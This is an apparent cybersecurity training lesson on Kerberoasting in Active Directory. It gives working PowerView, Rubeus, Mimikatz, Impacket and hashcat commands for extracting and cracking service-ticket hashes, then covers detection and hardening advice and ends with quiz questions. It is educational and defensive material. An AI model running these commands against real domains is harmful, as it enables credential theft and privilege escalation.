You have not logged in. Access is limited, Please login to get full Access

Kerberos - L1

Kerberos is a network authentication protocol designed to provide secure and encrypted authentication between users and services. It uses a ticket-based system to verify identities without transmitting passwords over the network. Developed by MIT, Kerberos is widely used in Windows Active Directory and other enterprise environments. It relies on a Key Distribution Center (KDC) to issue tickets, ensuring secure authentication and preventing credential theft through replay attacks.

Task 1 Kerberoasting Attack - Complete Guide

What is Kerberoasting?
Kerberoasting is an attack that allows an attacker to extract Kerberos service tickets (TGS) from Active Directory (AD) and crack them offline to recover plaintext passwords of service accounts.
Why is this attack dangerous?
● It does not require admin privileges—any domain user can request Kerberos tickets.

● Service accounts often have weak passwords and high privileges.

● Since the attack is offline, it does not generate authentication failures in logs.

________________________________________
How Kerberoasting Works? (Step-by-Step)
Step 1: Attacker Gets a Valid Domain User Account
● Any authenticated domain user can perform Kerberoasting.

● The attacker does not need to be an admin.

Step 2: Request a Service Ticket (TGS) for a Service Account
● The attacker queries Service Principal Names (SPNs) linked to service accounts.

● SPNs are used by Kerberos to map services to user accounts.

Example Command to Find Service Accounts (PowerView)
Get-NetUser -SPN

Step 3: Extract Kerberos Tickets from Memory
● The attacker requests a TGS ticket from the Domain Controller (DC).

● The TGS ticket is encrypted with the NTLM hash of the service account’s password.

Example Command to Request TGS Tickets (Rubeus)
Rubeus.exe kerberoast /format:hashcat

Step 4: Crack the Ticket Offline to Reveal the Password
● The attacker extracts the TGS hash and cracks it offline using hashcat or John the Ripper.

Example Hashcat Command (Cracking TGS Ticket)
hashcat -m 13100 <ticket_hash> rockyou.txt --force

Step 5: Use the Recovered Password for Privilege Escalation
● If the service account has admin privileges, the attacker can move laterally or escalate privileges.

● The attacker may perform Pass-the-Hash, DCSync, or Golden Ticket attacks.

________________________________________

Tools Used in Kerberoasting

Tool	Usage
PowerView	Enumerate service accounts with SPNs
Rubeus	Request TGS tickets & extract hashes
Mimikatz	Dump Kerberos tickets from memory
Impacket (GetUserSPNs.py)	Enumerate SPNs & extract tickets
Hashcat	Crack TGS hashes offline
John the Ripper	Alternative for cracking hashes

________________________________________
Example Commands for Each Tool
1. PowerView (Find SPNs for Kerberoasting)
Get-NetUser -SPN

Find service accounts with SPNs (targets for Kerberoasting).
________________________________________
2. Rubeus (Request TGS Tickets)
Rubeus.exe kerberoast /format:hashcat

Extracts service ticket hashes for offline cracking.
________________________________________
3. Mimikatz (Dump Kerberos Tickets)
privilege::debug
sekurlsa::tickets /export

Extracts Kerberos tickets from memory.
________________________________________
4. Impacket (Python Script for SPN Enumeration)
python3 GetUserSPNs.py -request DOMAIN/USER:PASSWORD@DC_IP

Lists all SPNs & requests their Kerberos tickets.
________________________________________
5. Crack the Hash with Hashcat
hashcat -m 13100 <ticket_hash> rockyou.txt --force

Uses dictionary attacks to recover plaintext passwords.
________________________________________
How to Detect & Prevent Kerberoasting?
Detection (Blue Team)
● Monitor Event ID 4769 (TGS requests with RC4 encryption).

● Look for multiple TGS requests from a single user (suspicious activity).

● Use Sysmon + SIEM tools to track unusual Kerberos activity.

Prevention (Security Hardening)

Use strong, long passwords for service accounts (25+ characters).
Remove SPNs from high-privileged accounts (avoid linking them to Domain Admins).
Enable AES encryption for Kerberos (disables RC4, making attacks harder).
Monitor abnormal Kerberos ticket requests (detect mass SPN queries).

________________________________________
Summary
● Kerberoasting targets service accounts in AD to extract TGS tickets and crack passwords offline.

● Attackers need only a valid domain user to launch this attack.

● Defenses include strong passwords, AES encryption, and log monitoring.

Here are 15 one-word questions with their corresponding answers and hints based on the content about Kerberoasting Attack:

Answer The Questions

Question 1.
What is the main target of a Kerberoasting attack?

Question 2.
Which type of ticket is extracted in a Kerberoasting attack?

Question 3.
Which protocol is leveraged during the Kerberoasting attack?

Question 4.

Which privilege is not required for Kerberoasting?

Question 5.
What command is used in PowerView to find SPNs?

Question 6.
Which tool is used to request TGS tickets in a Kerberoasting attack?

Question 7.
Which hash-cracking tool is used for cracking Kerberos ticket hashes offline?

Question 8.

What kind of encryption should be enabled to prevent Kerberoasting attacks?

Question 9.
What type of attack does Kerberoasting enable after cracking a service account password?

Question 10.
What command is used to dump Kerberos tickets from memory using Mimikatz?

Question 11.
What Python script can enumerate SPNs for Kerberoasting?

Question 12.
Which command-line tool is commonly used to crack ticket hashes in a Kerberoasting attack?

Question 13.
Which event ID should be monitored to detect Kerberoasting attacks?

Question 14.
What is a key defense against Kerberoasting?

Question 15.
Which tool can help monitor unusual Kerberos ticket requests during Kerberoasting detection?

Kerberos - L1

Task 1 Kerberoasting Attack - Complete Guide

Tools Used in Kerberoasting

Email Verification Required

Admin Panel